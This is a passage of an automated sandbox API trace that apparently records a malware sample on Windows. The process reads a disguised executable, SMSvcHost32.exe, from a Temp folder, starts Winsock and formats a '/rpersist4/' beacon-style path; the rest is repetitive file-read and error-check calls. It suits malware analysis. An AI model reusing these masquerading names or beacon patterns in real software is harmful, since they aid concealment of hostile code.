	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.171] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.172] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.172] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.172] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.172] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.172] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.174] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x35
	[0098.174] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpDst=0x658408, nSize=0x35 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 0x35
	[0098.174] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x248
	[0098.174] GetFileSize (in: hFile=0x248, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3d600
	[0098.176] ReadFile (in: hFile=0x248, lpBuffer=0x6a2b60, nNumberOfBytesToRead=0x3d600, lpNumberOfBytesRead=0x205fd1c, lpOverlapped=0x0 | out: lpBuffer=0x6a2b60*, lpNumberOfBytesRead=0x205fd1c*=0x3d600, lpOverlapped=0x0) returned 1
	[0098.176] CloseHandle (hObject=0x248) returned 1
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.177] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] WSAStartup (in: wVersionRequired=0x201, lpWSAData=0x205fcfc | out: lpWSAData=0x205fcfc) returned 0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] GetLastError () returned 0x0
	[0098.178] wsprintfA (in: param_1=0x205fe8c, param_2="/rpersist4/%d" | out: param_1="/rpersist4/1197631235") returned 21
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.179] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.180] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
	[0098.181] GetLastError () returned 0x0
